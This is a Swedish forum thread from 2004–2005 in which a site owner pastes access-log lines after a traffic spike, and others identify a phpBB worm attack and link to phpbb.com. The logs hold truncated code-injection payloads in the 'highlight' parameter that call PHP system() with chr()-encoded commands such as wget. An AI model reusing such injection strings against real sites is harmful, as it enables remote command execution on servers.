WN

WN (https://www.wn.se/forum/index.php)
-   Allmänt (https://www.wn.se/forum/forumdisplay.php?f=2)
-   -   besökare problem :/ (https://www.wn.se/forum/showthread.php?t=5247)

Jawn 2004-12-31 15:41

Har ett litet besökare problem just nu.
Enligt awstats så har jag 5000 - 6000 besökare helt plötsligt jag brukar ha runt 1200-1300 och det här ändrades på en dag vet inte hur alls.
Jag vet inte hur jag ska kolla var trafiken kommer ifrån men loggen står det så här


Kod:

Host: 217.154.1.226  /forum/viewtopic.php?t=225&highlight=%2527%252Esystem(chr(112)%252Echr(101)%252Echr(114)%252Echr(108)%252Echr(
 Http Code: 200 Date: Dec 31 15:21:48 Http Version: HTTP/1.0 Size in Bytes: 30671
 Referer: -
 Agent: Mozilla/4.0
 
 |
 |
 |
  /forum/viewtopic.php?t=225&highlight=%2527%252Esystem(chr(119)%252Echr(103)%252Echr(101)%252Echr(116)%252Echr(
 Http Code: 200 Date: Dec 31 15:21:49 Http Version: HTTP/1.0 Size in Bytes: 57227
 Referer: -
 Agent: Mozilla/4.0
 
 |
 |
 |
  /forum/viewtopic.php?t=225&highlight=%2527%252Esystem(chr(99)%252Echr(100)%252Echr(32)%252Echr(47)%252Echr(116
 Http Code: 200 Date: Dec 31 15:21:51 Http Version: HTTP/1.0 Size in Bytes: 57259
 Referer: -
 Agent: Mozilla/4.0


problemet med det här är att det äter bandbredd som *peep* bandbredd som jag inte har tillgång till just nu.
Normalt ligger bandbredden på runt 300mb/per dag men nu är det runt 3gig per dag.
Är lite vilse just nu kan det vara crawlers? det är olika ips alltid.

Några som har några ideér?

grazzy 2004-12-31 16:16

Tjohlahopp.

Det är nån som försöker hacka dig.
De försöker utföra ett kommando via system-anropet i PHP. om du går till www.asciitable.com och kollar upp vad de olika bokstäverna inom chr() står för så kommer du att kunna läsa vad de försöker göra. (eller lyckas göra tom).

Kommandot längst ner försöker göra "system('cd / ... ')".

Det är troligen masken som andra har skrivit om på förstasidan här.

dee 2005-01-01 20:31

Hej,

Jag har också blivit utsatt för detta och ganska ofta... har ingen aning va de gör å va som kan hända... tittade precis på asciitable.com men hittade inte de du kanste tänkte på? Kan du berätta lite mer va som händer tack =)

dee 2005-01-01 20:33

Okay, nu har ja tittat nogrannare... om ja förstår rätt så kan de utföra komandon... hur stoppar man detta?

N!cklas 2005-01-02 08:53

Läs vidare på phpbb.com


Alla tider är GMT +2. Klockan är nu 21:04.

Programvara från: vBulletin® Version 3.8.2
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Svensk översättning av: Anders Pettersson